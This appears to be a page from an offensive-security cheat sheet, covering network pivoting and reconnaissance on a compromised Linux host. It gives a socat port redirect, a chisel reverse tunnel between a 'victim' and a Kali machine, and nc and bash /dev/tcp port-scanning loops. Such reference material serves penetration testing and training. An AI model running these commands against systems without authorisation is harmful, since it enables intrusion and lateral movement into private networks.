pwny.cc
Search…
Home
WEB ATTACKS
Misc
OAuth
Open Redirect
Command Injection
Local File Inclusion (LFI)
Insecure File Upload
Insecure Direct Object Reference (IDOR)
SQL Injection (SQLi)
Cross-Site Scripting (XSS)
Server Side Request Forgery (SSRF)
Server Side Template Injection (SSTI)
XML External Entity (XXE)
SHELLS
Misc
Web Shells
Reverse Shells
Obfuscated Shells
SO
Linux
Internal Recon
Bypasses
Network
Exfiltration
Containers
Iptables
Windows
OTHER
Sandbox Escape
Cracking
Powered By
GitBook
Network
Socat TCP redirection
1
#Example HTTP redirection: socat TCP4-LISTEN:80,fork TCP4:10.10.10.19:80
2
socat TCP4-LISTEN:
<
PORT
>
,fork TCP4:
<
REMOTE-HOST-IP-ADDRESS
>
:
<
REMOTE-HOST-PORT
>
Copied!
Chisel TCP tunnel over HTTP
1
#Download chisel for victim machine version
2
#10.10.10.19 == kali_IP. 4506 == Port to redirect.
3
./chisel client
10.10
.10.19:10000 R:4506:127.0.0.1:4506
#In Victim Machine
4
./chisel server -p
10000
--reverse
#In Kali Machine
Copied!
Releases · jpillora/chisel
GitHub
Chisel - Releases
Enum ports using nc
1
#nc -zv IP PORT-RANGE
2
nc
-zv
127.0
.0.1
20
-80
Copied!
Scan IP/Ports from Bash
1
for
ip
in
{
1
..
254
};
2
do
for
port
in
{
22,80
,443
};
3
do
(
echo
>
/dev/tcp/10.10.10.
$ip
/
$port
)
>&
/dev/null
\
4
&&
echo
"10.10.10.
$ip
:
$port
is open"
;
5
done
;
6
done
;
Copied!
Previous
Bypasses
Next
Exfiltration
Last modified
7mo ago
Copy link
Contents
Socat TCP redirection
Chisel TCP tunnel over HTTP
Enum ports using nc
Scan IP/Ports from Bash